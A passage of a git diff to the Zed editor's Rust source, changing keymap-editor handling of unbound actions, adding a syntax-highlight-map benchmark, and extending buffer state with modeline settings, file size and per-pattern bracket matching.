KeymapEditor { .cloned() .unwrap_or_default() .into_any_element(), - |binding| ui::KeyBinding::from_keystrokes(binding.keystrokes.clone(), binding.source).into_any_element() + |binding| ui::KeyBinding::from_keystrokes(binding.keystrokes.clone(), binding.source == KeybindSource::Vim).into_any_element() ); let action_arguments = match binding.action().arguments.clone() @@ -2027,7 +2215,7 @@ impl Render for KeymapEditor { .when( is_local && !context_menu_deployed - && !is_overridden + && !is_dimmed && this.show_hover_menus, |this| { this.tooltip(Tooltip::element({ @@ -2062,6 +2250,10 @@ impl Render for KeymapEditor { .map_row(cx.processor( |this, (row_index, row): (usize, Stateful

), _window, cx| { let conflict = this.get_conflict(row_index); + let candidate_id = this.matches.get(row_index).map(|candidate| candidate.candidate_id); + let is_unbound_by_unbind = candidate_id + .and_then(|candidate_id| this.keybindings.get(candidate_id)) + .is_some_and(ProcessedBinding::is_unbound_by_unbind); let is_selected = this.selected_index == Some(row_index); let row_id = row_group_id(row_index); @@ -2070,38 +2262,43 @@ impl Render for KeymapEditor { .id(("keymap-row-wrapper", row_index)) .child( row.id(row_id.clone()) - .on_any_mouse_down(cx.listener( - move |this, - mouse_down_event: &gpui::MouseDownEvent, - window, - cx| { - if mouse_down_event.button == MouseButton::Right { - this.select_index( - row_index, None, window, cx, - ); - this.create_context_menu( - mouse_down_event.position, - window, - cx, - ); - } - }, - )) - .on_click(cx.listener( - move |this, event: &ClickEvent, window, cx| { - this.select_index(row_index, None, window, cx); - if event.click_count() == 2 { - this.open_edit_keybinding_modal( - false, window, cx, - ); - } - }, - )) + .when(!is_unbound_by_unbind, |row| { + row.on_any_mouse_down(cx.listener( + move |this, + mouse_down_event: &gpui::MouseDownEvent, + window, + cx| { + if mouse_down_event.button == MouseButton::Right { + this.select_index( + row_index, None, window, cx, + ); + this.create_context_menu( + mouse_down_event.position, + window, + cx, + ); + } + }, + )) + }) + .when(!is_unbound_by_unbind, |row| { + row.on_click(cx.listener( + move |this, event: &ClickEvent, window, cx| { + this.select_index(row_index, None, window, cx); + if event.click_count() == 2 { + this.open_edit_keybinding_modal( + false, window, cx, + ); + } + }, + )) + }) .group(row_id) .when( - conflict.is_some_and(|conflict| { - !conflict.is_user_keybind_conflict() - }), + is_unbound_by_unbind + || conflict.is_some_and(|conflict| { + !conflict.is_user_keybind_conflict() + }), |row| { const OVERRIDDEN_OPACITY: f32 = 0.5; row.opacity(OVERRIDDEN_OPACITY) @@ -2109,7 +2306,8 @@ impl Render for KeymapEditor { ) .when_some( conflict.filter(|conflict| { - !this.context_menu_deployed() && + !is_unbound_by_unbind + && !this.context_menu_deployed() && !conflict.is_user_keybind_conflict() }), |row, conflict| { @@ -2126,8 +2324,12 @@ impl Render for KeymapEditor { }.map(|source| format!("This keybinding is overridden by the '{}' binding from {}.", binding.action().humanized_name, source)) }).unwrap_or_else(|| "This binding is overridden.".to_string()); - row.tooltip(Tooltip::text(context))}, - ), + row.tooltip(Tooltip::text(context)) + }, + ) + .when(is_unbound_by_unbind, |row| { + row.tooltip(Tooltip::text("This action is unbound")) + }), ) .border_2() .when( @@ -2208,9 +2410,10 @@ impl RenderOnce for SyntaxHighlightedText { } let mut run_style = text_style.clone(); - if let Some(highlight_style) = highlight_id.style(syntax_theme) { + if let Some(highlight_style) = syntax_theme.get(highlight_id).cloned() { run_style = run_style.highlight(highlight_style); } + // add the highlighted range runs.push(run_style.to_run(highlight_range.len())); offset = highlight_range.end; @@ -2928,9 +3131,11 @@ impl Render for KeybindingEditorModal { .child( Button::new("show_matching", "View") .label_size(LabelSize::Small) - .icon(IconName::ArrowUpRight) - .icon_color(Color::Muted) - .icon_size(IconSize::Small) + .end_icon( + Icon::new(IconName::ArrowUpRight) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener( |this, _, window, cx| { this.show_matching_bindings( @@ -3230,7 +3435,7 @@ impl ActionArgumentsEditor { impl Render for ActionArgumentsEditor { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { - let settings = theme::ThemeSettings::get_global(cx); + let settings = theme_settings::ThemeSettings::get_global(cx); let colors = cx.theme().colors(); let border_color = if self.is_loading { @@ -3275,7 +3480,6 @@ struct KeyContextCompletionProvider { impl CompletionProvider for KeyContextCompletionProvider { fn completions( &self, - _excerpt_id: editor::ExcerptId, buffer: &Entity, buffer_position: language::Anchor, _trigger: editor::CompletionContext, @@ -3711,13 +3915,8 @@ impl SerializableItem for KeymapEditor { _window: &mut Window, cx: &mut App, ) -> gpui::Task> { - workspace::delete_unloaded_items( - alive_items, - workspace_id, - "keybinding_editors", - &KEYBINDING_EDITORS, - cx, - ) + let db = KeybindingEditorDb::global(cx); + workspace::delete_unloaded_items(alive_items, workspace_id, "keybinding_editors", &db, cx) } fn deserialize( @@ -3728,11 +3927,9 @@ impl SerializableItem for KeymapEditor { window: &mut Window, cx: &mut App, ) -> gpui::Task>> { + let db = KeybindingEditorDb::global(cx); window.spawn(cx, async move |cx| { - if KEYBINDING_EDITORS - .get_keybinding_editor(item_id, workspace_id)? - .is_some() - { + if db.get_keybinding_editor(item_id, workspace_id)?.is_some() { cx.update(|window, cx| cx.new(|cx| KeymapEditor::new(workspace, window, cx))) } else { Err(anyhow!("No keybinding editor to deserialize")) @@ -3749,11 +3946,10 @@ impl SerializableItem for KeymapEditor { cx: &mut ui::Context, ) -> Option>> { let workspace_id = workspace.database_id()?; - Some(cx.background_spawn(async move { - KEYBINDING_EDITORS - .save_keybinding_editor(item_id, workspace_id) - .await - })) + let db = KeybindingEditorDb::global(cx); + Some(cx.background_spawn( + async move { db.save_keybinding_editor(item_id, workspace_id).await }, + )) } fn should_serialize(&self, _event: &Self::Event) -> bool { @@ -3782,7 +3978,7 @@ mod persistence { )]; } - db::static_connection!(KEYBINDING_EDITORS, KeybindingEditorDb, [WorkspaceDb]); + db::static_connection!(KeybindingEditorDb, [WorkspaceDb]); impl KeybindingEditorDb { query! { @@ -3955,4 +4151,25 @@ mod tests { assert!(cmp("!(!(!a))", "!a")); assert!(cmp("!(!(!(!a)))", "a")); } + + #[test] + fn binding_is_unbound_by_unbind_respects_precedence() { + let binding = gpui::KeyBinding::new("tab", zed_actions::OpenKeymap, None); + let unbind = + gpui::KeyBinding::new("tab", gpui::Unbind(binding.action().name().into()), None); + + let unbind_then_binding = vec![&unbind, &binding]; + assert!(!binding_is_unbound_by_unbind( + &binding, + 1, + &unbind_then_binding, + )); + + let binding_then_unbind = vec![&binding, &unbind]; + assert!(binding_is_unbound_by_unbind( + &binding, + 0, + &binding_then_unbind, + )); + } } diff --git a/crates/keymap_editor/src/ui_components/keystroke_input.rs b/crates/keymap_editor/src/ui_components/keystroke_input.rs index e1f20de587c274a164a96e3b8d7189a3710ff301..75cc2869c855283302e9e2ce57b9a511f8ba4d37 100644 --- a/crates/keymap_editor/src/ui_components/keystroke_input.rs +++ b/crates/keymap_editor/src/ui_components/keystroke_input.rs @@ -1115,7 +1115,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); let fs = FakeFs::new(cx.executor()); diff --git a/crates/language/Cargo.toml b/crates/language/Cargo.toml index 58db79afe59f0e6d27e23eceb9861ea493d853fd..1392ed63f64b7d3e3f6ebb9f629168f6096c5b61 100644 --- a/crates/language/Cargo.toml +++ b/crates/language/Cargo.toml @@ -40,6 +40,7 @@ globset.workspace = true gpui.workspace = true http_client.workspace = true imara-diff.workspace = true +language_core.workspace = true itertools.workspace = true log.workspace = true lsp.workspace = true @@ -48,7 +49,6 @@ postage.workspace = true rand = { workspace = true, optional = true } regex.workspace = true rpc.workspace = true -schemars.workspace = true semver.workspace = true serde.workspace = true serde_json.workspace = true @@ -62,6 +62,7 @@ sum_tree.workspace = true task.workspace = true text.workspace = true theme.workspace = true +toml.workspace = true tracing.workspace = true tree-sitter-md = { workspace = true, optional = true } tree-sitter-python = { workspace = true, optional = true } @@ -100,6 +101,12 @@ toml.workspace = true unindent.workspace = true util = { workspace = true, features = ["test-support"] } zlog.workspace = true +criterion.workspace = true +theme_settings.workspace = true + +[[bench]] +name = "highlight_map" +harness = false [package.metadata.cargo-machete] ignored = ["tracing"] diff --git a/crates/language/benches/highlight_map.rs b/crates/language/benches/highlight_map.rs new file mode 100644 index 0000000000000000000000000000000000000000..678bd08a8db40b588c6f2716a14b04048fb46d23 --- /dev/null +++ b/crates/language/benches/highlight_map.rs @@ -0,0 +1,144 @@ +use criterion::{BenchmarkId, Criterion, black_box, criterion_group, criterion_main}; +use gpui::rgba; +use language::build_highlight_map; +use theme::SyntaxTheme; + +fn syntax_theme(highlight_names: &[&str]) -> SyntaxTheme { + SyntaxTheme::new(highlight_names.iter().enumerate().map(|(i, name)| { + let r = ((i * 37) % 256) as u8; + let g = ((i * 53) % 256) as u8; + let b = ((i * 71) % 256) as u8; + let color = rgba(u32::from_be_bytes([r, g, b, 0xff])); + (name.to_string(), color.into()) + })) +} + +static SMALL_THEME_KEYS: &[&str] = &[ + "comment", "function", "keyword", "string", "type", "variable", +]; + +static LARGE_THEME_KEYS: &[&str] = &[ + "attribute", + "boolean", + "comment", + "comment.doc", + "constant", + "constant.builtin", + "constructor", + "embedded", + "emphasis", + "emphasis.strong", + "function", + "function.builtin", + "function.method", + "function.method.builtin", + "function.special.definition", + "keyword", + "keyword.control", + "keyword.control.conditional", + "keyword.control.import", + "keyword.control.repeat", + "keyword.control.return", + "keyword.modifier", + "keyword.operator", + "label", + "link_text", + "link_uri", + "number", + "operator", + "property", + "punctuation", + "punctuation.bracket", + "punctuation.delimiter", + "punctuation.list_marker", + "punctuation.special", + "string", + "string.escape", + "string.regex", + "string.special", + "string.special.symbol", + "tag", + "text.literal", + "title", + "type", + "type.builtin", + "type.super", + "variable", + "variable.builtin", + "variable.member", + "variable.parameter", + "variable.special", +]; + +static SMALL_CAPTURE_NAMES: &[&str] = &[ + "function", + "keyword", + "string.escape", + "type.builtin", + "variable.builtin", +]; + +static LARGE_CAPTURE_NAMES: &[&str] = &[ + "attribute", + "boolean", + "comment", + "comment.doc", + "constant", + "constant.builtin", + "constructor", + "function", + "function.builtin", + "function.method", + "keyword", + "keyword.control", + "keyword.control.conditional", + "keyword.control.import", + "keyword.modifier", + "keyword.operator", + "label", + "number", + "operator", + "property", + "punctuation.bracket", + "punctuation.delimiter", + "punctuation.special", + "string", + "string.escape", + "string.regex", + "string.special", + "tag", + "type", + "type.builtin", + "variable", + "variable.builtin", + "variable.member", + "variable.parameter", +]; + +fn bench_build_highlight_map(c: &mut Criterion) { + let mut group = c.benchmark_group("build_highlight_map"); + + for (capture_label, capture_names) in [ + ("small_captures", SMALL_CAPTURE_NAMES as &[&str]), + ("large_captures", LARGE_CAPTURE_NAMES as &[&str]), + ] { + for (theme_label, theme_keys) in [ + ("small_theme", SMALL_THEME_KEYS as &[&str]), + ("large_theme", LARGE_THEME_KEYS as &[&str]), + ] { + let theme = syntax_theme(theme_keys); + group.bench_with_input( + BenchmarkId::new(capture_label, theme_label), + &(capture_names, &theme), + |b, (capture_names, theme)| { + b.iter(|| build_highlight_map(black_box(capture_names), black_box(theme))); + }, + ); + } + } + + group.finish(); +} + +criterion_group!(benches, bench_build_highlight_map); +criterion_main!(benches); diff --git a/crates/language/src/buffer.rs b/crates/language/src/buffer.rs index 1449052983a49a539201360ec48dd37c04a4ccae..a467cd789555d39a32ad4e1d7b21da7b14df9c25 100644 --- a/crates/language/src/buffer.rs +++ b/crates/language/src/buffer.rs @@ -1,10 +1,10 @@ pub mod row_chunk; use crate::{ - DebuggerTextObject, LanguageScope, Outline, OutlineConfig, PLAIN_TEXT, RunnableCapture, - RunnableTag, TextObject, TreeSitterOptions, + DebuggerTextObject, LanguageScope, ModelineSettings, Outline, OutlineConfig, PLAIN_TEXT, + RunnableCapture, RunnableTag, TextObject, TreeSitterOptions, diagnostic_set::{DiagnosticEntry, DiagnosticEntryRef, DiagnosticGroup}, - language_settings::{LanguageSettings, language_settings}, + language_settings::{AutoIndentMode, LanguageSettings}, outline::OutlineItem, row_chunk::RowChunks, syntax_map::{ @@ -16,11 +16,10 @@ use crate::{ unified_diff_with_offsets, }; pub use crate::{ - Grammar, Language, LanguageRegistry, - diagnostic_set::DiagnosticSet, - highlight_map::{HighlightId, HighlightMap}, + Grammar, HighlightId, HighlightMap, Language, LanguageRegistry, diagnostic_set::DiagnosticSet, proto, }; + use anyhow::{Context as _, Result}; use clock::Lamport; pub use clock::ReplicaId; @@ -33,10 +32,8 @@ use gpui::{ Task, TextStyle, }; -use lsp::{LanguageServerId, NumberOrString}; +use lsp::LanguageServerId; use parking_lot::Mutex; -use serde::{Deserialize, Serialize}; -use serde_json::Value; use settings::WorktreeId; use smallvec::SmallVec; use smol::future::yield_now; @@ -135,6 +132,7 @@ pub struct Buffer { /// The contents of a cell are (self.version, has_changes) at the time of a last call. has_unsaved_edits: Cell<(clock::Global, bool)>, change_bits: Vec>>, + modeline: Option>, _subscriptions: Vec, tree_sitter_data: Arc, encoding: &'static Encoding, @@ -187,7 +185,7 @@ struct BufferBranchState { /// state of a buffer. pub struct BufferSnapshot { pub text: text::BufferSnapshot, - pub syntax: SyntaxSnapshot, + pub(crate) syntax: SyntaxSnapshot, tree_sitter_data: Arc, diagnostics: TreeMap, remote_selections: TreeMap, @@ -195,6 +193,7 @@ pub struct BufferSnapshot { file: Option>, non_text_state_update_count: usize, pub capability: Capability, + modeline: Option>, } /// The kind and amount of indentation in a particular line. For now, @@ -250,57 +249,6 @@ struct SelectionSet { lamport_timestamp: clock::Lamport, } -/// A diagnostic associated with a certain range of a buffer. -#[derive(Clone, Debug, PartialEq, Eq, Serialize, Deserialize)] -pub struct Diagnostic { - /// The name of the service that produced this diagnostic. - pub source: Option, - /// The ID provided by the dynamic registration that produced this diagnostic. - pub registration_id: Option, - /// A machine-readable code that identifies this diagnostic. - pub code: Option, - pub code_description: Option, - /// Whether this diagnostic is a hint, warning, or error. - pub severity: DiagnosticSeverity, - /// The human-readable message associated with this diagnostic. - pub message: String, - /// The human-readable message (in markdown format) - pub markdown: Option, - /// An id that identifies the group to which this diagnostic belongs. - /// - /// When a language server produces a diagnostic with - /// one or more associated diagnostics, those diagnostics are all - /// assigned a single group ID. - pub group_id: usize, - /// Whether this diagnostic is the primary diagnostic for its group. - /// - /// In a given group, the primary diagnostic is the top-level diagnostic - /// returned by the language server. The non-primary diagnostics are the - /// associated diagnostics. - pub is_primary: bool, - /// Whether this diagnostic is considered to originate from an analysis of - /// files on disk, as opposed to any unsaved buffer contents. This is a - /// property of a given diagnostic source, and is configured for a given - /// language server via the [`LspAdapter::disk_based_diagnostic_sources`](crate::LspAdapter::disk_based_diagnostic_sources) method - /// for the language server. - pub is_disk_based: bool, - /// Whether this diagnostic marks unnecessary code. - pub is_unnecessary: bool, - /// Quick separation of diagnostics groups based by their source. - pub source_kind: DiagnosticSourceKind, - /// Data from language server that produced this diagnostic. Passed back to the LS when we request code actions for this diagnostic. - pub data: Option, - /// Whether to underline the corresponding text range in the editor. - pub underline: bool, -} - -#[derive(Clone, Copy, Debug, PartialEq, Eq, Serialize, Deserialize)] -pub enum DiagnosticSourceKind { - Pulled, - Pushed, - Other, -} - /// An operation used to synchronize this buffer with its other replicas. #[derive(Clone, Debug, PartialEq)] pub enum Operation { @@ -359,7 +307,7 @@ pub enum BufferEvent { is_local: bool, }, /// The buffer was edited. - Edited, + Edited { is_local: bool }, /// The buffer's `dirty` bit changed. DirtyChanged, /// The buffer was saved. @@ -435,7 +383,7 @@ pub enum DiskState { /// File created in Zed that has not been saved. New, /// File present on the filesystem. - Present { mtime: MTime }, + Present { mtime: MTime, size: u64 }, /// Deleted file that was previously present. Deleted, /// An old version of a file that was previously present @@ -448,7 +396,17 @@ impl DiskState { pub fn mtime(self) -> Option { match self { DiskState::New => None, - DiskState::Present { mtime } => Some(mtime), + DiskState::Present { mtime, .. } => Some(mtime), + DiskState::Deleted => None, + DiskState::Historic { .. } => None, + } + } + + /// Returns the file's size on disk in bytes. + pub fn size(self) -> Option { + match self { + DiskState::New => None, + DiskState::Present { size, .. } => Some(size), DiskState::Deleted => None, DiskState::Historic { .. } => None, } @@ -737,7 +695,7 @@ impl HighlightedTextBuilder { if let Some(highlight_style) = chunk .syntax_highlight_id - .and_then(|id| id.style(syntax_theme)) + .and_then(|id| syntax_theme.get(id).cloned()) { let highlight_style = override_style.map_or(highlight_style, |override_style| { highlight_style.highlight(override_style) @@ -1153,6 +1111,7 @@ impl Buffer { deferred_ops: OperationQueue::new(), has_conflict: false, change_bits: Default::default(), + modeline: None, _subscriptions: Vec::new(), encoding: encoding_rs::UTF_8, has_bom: false, @@ -1165,6 +1124,7 @@ impl Buffer { text: Rope, language: Option>, language_registry: Option>, + modeline: Option>, cx: &mut App, ) -> impl Future + use<> { let entity_id = cx.reserve_entity::().entity_id(); @@ -1189,6 +1149,7 @@ impl Buffer { language, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline, } } } @@ -1215,6 +1176,7 @@ impl Buffer { language: None, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline: None, } } @@ -1245,6 +1207,7 @@ impl Buffer { language, non_text_state_update_count: 0, capability: Capability::ReadOnly, + modeline: None, } } @@ -1275,6 +1238,7 @@ impl Buffer { language: self.language.clone(), non_text_state_update_count: self.non_text_state_update_count, capability: self.capability, + modeline: self.modeline.clone(), } } @@ -1527,6 +1491,21 @@ impl Buffer { ); } + /// Assign the buffer [`ModelineSettings`]. + pub fn set_modeline(&mut self, modeline: Option) -> bool { + if modeline.as_ref() != self.modeline.as_deref() { + self.modeline = modeline.map(Arc::new); + true + } else { + false + } + } + + /// Returns the [`ModelineSettings`]. + pub fn modeline(&self) -> Option<&Arc> { + self.modeline.as_ref() + } + /// Assign the buffer a new [`Capability`]. pub fn set_capability(&mut self, capability: Capability, cx: &mut Context) { if self.capability != capability { @@ -1776,7 +1755,9 @@ impl Buffer { self.syntax_map.lock().contains_unknown_injections() } - #[cfg(any(test, feature = "test-support"))] + /// Sets the sync parse timeout for this buffer. + /// + /// Setting this to `None` disables sync parsing entirely. pub fn set_sync_parse_timeout(&mut self, timeout: Option) { self.sync_parse_timeout = timeout; } @@ -2375,7 +2356,7 @@ impl Buffer { }; match file.disk_state() { DiskState::New => false, - DiskState::Present { mtime } => match self.saved_mtime { + DiskState::Present { mtime, .. } => match self.saved_mtime { Some(saved_mtime) => { mtime.bad_is_greater_than(saved_mtime) && self.has_unsaved_edits() } @@ -2455,7 +2436,7 @@ impl Buffer { false }; if let Some((transaction_id, start_version)) = self.text.end_transaction_at(now) { - self.did_edit(&start_version, was_dirty, cx); + self.did_edit(&start_version, was_dirty, true, cx); Some(transaction_id) } else { None @@ -2736,17 +2717,22 @@ impl Buffer { .filter(|((_, (range, _)), _)| { let language = before_edit.language_at(range.start); let language_id = language.map(|l| l.id()); - if let Some((cached_language_id, auto_indent)) = previous_setting + if let Some((cached_language_id, apply_syntax_indent)) = previous_setting && cached_language_id == language_id { - auto_indent + apply_syntax_indent } else { // The auto-indent setting is not present in editorconfigs, hence // we can avoid passing the file here. - let auto_indent = - language_settings(language.map(|l| l.name()), None, cx).auto_indent; - previous_setting = Some((language_id, auto_indent)); - auto_indent + let auto_indent_mode = LanguageSettings::resolve( + None, + language.map(|l| l.name()).as_ref(), + cx, + ) + .auto_indent; + let apply_syntax_indent = auto_indent_mode == AutoIndentMode::SyntaxAware; + previous_setting = Some((language_id, apply_syntax_indent)); + apply_syntax_indent } }) .map(|((ix, (range, _)), new_text)| { @@ -2841,7 +2827,13 @@ impl Buffer { Some(edit_id) } - fn did_edit(&mut self, old_version: &clock::Global, was_dirty: bool, cx: &mut Context) { + fn did_edit( + &mut self, + old_version: &clock::Global, + was_dirty: bool, + is_local: bool, + cx: &mut Context, + ) { self.was_changed(); if self.edits_since::(old_version).next().is_none() { @@ -2849,10 +2841,20 @@ impl Buffer { } self.reparse(cx, true); - cx.emit(BufferEvent::Edited); - if was_dirty != self.is_dirty() { + cx.emit(BufferEvent::Edited { is_local }); + let is_dirty = self.is_dirty(); + if was_dirty != is_dirty { cx.emit(BufferEvent::DirtyChanged); } + if was_dirty && !is_dirty { + if let Some(file) = self.file.as_ref() { + if matches!(file.disk_state(), DiskState::Present { .. }) + && file.disk_state().mtime() != self.saved_mtime + { + cx.emit(BufferEvent::ReloadNeeded); + } + } + } cx.notify(); } @@ -2961,7 +2963,7 @@ impl Buffer { self.text.apply_ops(buffer_ops); self.deferred_ops.insert(deferred_ops); self.flush_deferred_ops(cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, false, cx); // Notify independently of whether the buffer was edited as the operations could include a // selection update. cx.notify(); @@ -3116,7 +3118,7 @@ impl Buffer { if let Some((transaction_id, operation)) = self.text.undo() { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); self.restore_encoding_for_transaction(transaction_id, was_dirty); Some(transaction_id) } else { @@ -3134,7 +3136,7 @@ impl Buffer { let old_version = self.version.clone(); if let Some(operation) = self.text.undo_transaction(transaction_id) { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); true } else { false @@ -3156,7 +3158,7 @@ impl Buffer { self.send_operation(Operation::Buffer(operation), true, cx); } if undone { - self.did_edit(&old_version, was_dirty, cx) + self.did_edit(&old_version, was_dirty, true, cx) } undone } @@ -3166,7 +3168,7 @@ impl Buffer { let operation = self.text.undo_operations(counts); let old_version = self.version.clone(); self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); } /// Manually redoes a specific transaction in the buffer's redo history. @@ -3176,7 +3178,7 @@ impl Buffer { if let Some((transaction_id, operation)) = self.text.redo() { self.send_operation(Operation::Buffer(operation), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); self.restore_encoding_for_transaction(transaction_id, was_dirty); Some(transaction_id) } else { @@ -3217,7 +3219,7 @@ impl Buffer { self.send_operation(Operation::Buffer(operation), true, cx); } if redone { - self.did_edit(&old_version, was_dirty, cx) + self.did_edit(&old_version, was_dirty, true, cx) } redone } @@ -3272,6 +3274,10 @@ impl Buffer { pub fn preserve_preview(&self) -> bool { !self.has_edits_since(&self.preview_version) } + + pub fn set_group_interval(&mut self, group_interval: Duration) { + self.text.set_group_interval(group_interval); + } } #[doc(hidden)] @@ -3287,10 +3293,6 @@ impl Buffer { self.edit(edits, autoindent_mode, cx); } - pub fn set_group_interval(&mut self, group_interval: Duration) { - self.text.set_group_interval(group_interval); - } - pub fn randomly_edit(&mut self, rng: &mut T, old_range_count: usize, cx: &mut Context) where T: rand::Rng, @@ -3327,7 +3329,7 @@ impl Buffer { if !ops.is_empty() { for op in ops { self.send_operation(Operation::Buffer(op), true, cx); - self.did_edit(&old_version, was_dirty, cx); + self.did_edit(&old_version, was_dirty, true, cx); } } } @@ -3368,11 +3370,7 @@ impl BufferSnapshot { /// Returns [`IndentSize`] for a given position that respects user settings /// and language preferences. pub fn language_indent_size_at(&self, position: T, cx: &App) -> IndentSize { - let settings = language_settings( - self.language_at(position).map(|l| l.name()), - self.file(), - cx, - ); + let settings = self.settings_at(position, cx); if settings.hard_tabs { IndentSize::tab() } else { @@ -3706,6 +3704,14 @@ impl BufferSnapshot { None } + pub fn captures( + &self, + range: Range, + query: fn(&Grammar) -> Option<&tree_sitter::Query>, + ) -> SyntaxMapCaptures<'_> { + self.syntax.captures(range, &self.text, query) + } + #[ztracing::instrument(skip_all)] fn get_highlights(&self, range: Range) -> (SyntaxMapCaptures<'_>, Vec) { let captures = self.syntax.captures(range, &self.text, |grammar| { @@ -3830,6 +3836,11 @@ impl BufferSnapshot { }) } + /// Returns the [`ModelineSettings`]. + pub fn modeline(&self) -> Option<&Arc> { + self.modeline.as_ref() + } + /// Returns the main [`Language`]. pub fn language(&self) -> Option<&Arc> { self.language.as_ref() @@ -3848,11 +3859,7 @@ impl BufferSnapshot { position: D, cx: &'a App, ) -> Cow<'a, LanguageSettings> { - language_settings( - self.language_at(position).map(|l| l.name()), - self.file.as_ref(), - cx, - ) + LanguageSettings::for_buffer_snapshot(self, Some(position.to_offset(self)), cx) } pub fn char_classifier_at(&self, point: T) -> CharClassifier { @@ -4490,7 +4497,8 @@ impl BufferSnapshot { let style = chunk .syntax_highlight_id .zip(theme) - .and_then(|(highlight, theme)| highlight.style(theme)); + .and_then(|(highlight, theme)| theme.get(highlight).cloned()); + if let Some(style) = style { let start = text.len(); let end = start + chunk.text.len(); @@ -4573,7 +4581,7 @@ impl BufferSnapshot { continue; } - let mut all_brackets: Vec<(BracketMatch, bool)> = Vec::new(); + let mut all_brackets: Vec<(BracketMatch, usize, bool)> = Vec::new(); let mut opens = Vec::new(); let mut color_pairs = Vec::new(); @@ -4599,8 +4607,9 @@ impl BufferSnapshot { let mut open = None; let mut close = None; let syntax_layer_depth = mat.depth; + let pattern_index = mat.pattern_index; let config = configs[mat.grammar_index]; - let pattern = &config.patterns[mat.pattern_index]; + let pattern = &config.patterns[pattern_index]; for capture in mat.captures { if capture.index == config.open_capture_ix { open = Some(capture.node.byte_range()); @@ -4621,7 +4630,7 @@ impl BufferSnapshot { } open_to_close_ranges - .entry((open_range.start, open_range.end)) + .entry((open_range.start, open_range.end, pattern_index)) .or_insert_with(BTreeMap::new) .insert( (close_range.start, close_range.end), @@ -4642,6 +4651,7 @@ impl BufferSnapshot { newline_only: pattern.newline_only, color_index: None, }, + pattern_index, pattern.rainbow_exclude, )); } @@ -4655,22 +4665,43 @@ impl BufferSnapshot { // For each close, we know the expected open_len from tree-sitter matches. // Map each close to its expected open length (for inferring opens) - let close_to_open_len: HashMap<(usize, usize), usize> = all_brackets + let close_to_open_len: HashMap<(usize, usize, usize), usize> = all_brackets .iter() - .map(|(m, _)| ((m.close_range.start, m.close_range.end), m.open_range.len())) + .map(|(bracket_match, pattern_index, _)| { + ( + ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ), + bracket_match.open_range.len(), + ) + }) .collect(); // Collect unique opens and closes within this chunk - let mut unique_opens: HashSet<(usize, usize)> = all_brackets + let mut unique_opens: HashSet<(usize, usize, usize)> = all_brackets .iter() - .map(|(m, _)| (m.open_range.start, m.open_range.end)) - .filter(|(start, _)| chunk_range.contains(start)) + .map(|(bracket_match, pattern_index, _)| { + ( + bracket_match.open_range.start, + bracket_match.open_range.end, + *pattern_index, + ) + }) + .filter(|(start, _, _)| chunk_range.contains(start)) .collect(); - let mut unique_closes: Vec<(usize, usize)> = all_brackets + let mut unique_closes: Vec<(usize, usize, usize)> = all_brackets .iter() - .map(|(m, _)| (m.close_range.start, m.close_range.end)) - .filter(|(start, _)| chunk_range.contains(start)) + .map(|(bracket_match, pattern_index, _)| { + ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ) + }) + .filter(|(start, _, _)| chunk_range.contains(start)) .collect(); unique_closes.sort(); unique_closes.dedup(); @@ -4679,8 +4710,9 @@ impl BufferSnapshot { let mut unique_opens_vec: Vec<_> = unique_opens.iter().copied().collect(); unique_opens_vec.sort(); - let mut valid_pairs: HashSet<((usize, usize), (usize, usize))> = HashSet::default(); - let mut open_stack: Vec<(usize, usize)> = Vec::new(); + let mut valid_pairs: HashSet<((usize, usize, usize), (usize, usize, usize))> = + HashSet::default(); + let mut open_stacks: HashMap> = HashMap::default(); let mut open_idx = 0; for close in &unique_closes { @@ -4688,36 +4720,53 @@ impl BufferSnapshot { while open_idx < unique_opens_vec.len() && unique_opens_vec[open_idx].0 < close.0 { - open_stack.push(unique_opens_vec[open_idx]); + let (start, end, pattern_index) = unique_opens_vec[open_idx]; + open_stacks + .entry(pattern_index) + .or_default() + .push((start, end)); open_idx += 1; } // Try to match with most recent open - if let Some(open) = open_stack.pop() { - valid_pairs.insert((open, *close)); + let (close_start, close_end, pattern_index) = *close; + if let Some(open) = open_stacks + .get_mut(&pattern_index) + .and_then(|open_stack| open_stack.pop()) + { + valid_pairs.insert(((open.0, open.1, pattern_index), *close)); } else if let Some(&open_len) = close_to_open_len.get(close) { // No open on stack - infer one based on expected open_len - if close.0 >= open_len { - let inferred = (close.0 - open_len, close.0); + if close_start >= open_len { + let inferred = (close_start - open_len, close_start, pattern_index); unique_opens.insert(inferred); valid_pairs.insert((inferred, *close)); all_brackets.push(( BracketMatch { open_range: inferred.0..inferred.1, - close_range: close.0..close.1, + close_range: close_start..close_end, newline_only: false, syntax_layer_depth: 0, color_index: None, }, + pattern_index, false, )); } } } - all_brackets.retain(|(m, _)| { - let open = (m.open_range.start, m.open_range.end); - let close = (m.close_range.start, m.close_range.end); + all_brackets.retain(|(bracket_match, pattern_index, _)| { + let open = ( + bracket_match.open_range.start, + bracket_match.open_range.end, + *pattern_index, + ); + let close = ( + bracket_match.close_range.start, + bracket_match.close_range.end, + *pattern_index, + ); valid_pairs.contains(&(open, close)) }); } @@ -4725,7 +4774,7 @@ impl BufferSnapshot { let mut all_brackets = all_brackets .into_iter() .enumerate() - .map(|(index, (bracket_match, rainbow_exclude))| { + .map(|(index, (bracket_match, _, rainbow_exclude))| { // Certain languages have "brackets" that are not brackets, e.g. tags. and such // bracket will match the entire tag with all text inside. // For now, avoid highlighting any pair that has more than single char in each bracket. @@ -5433,6 +5482,7 @@ impl Clone for BufferSnapshot { tree_sitter_data: self.tree_sitter_data.clone(), non_text_state_update_count: self.non_text_state_update_count, capability: 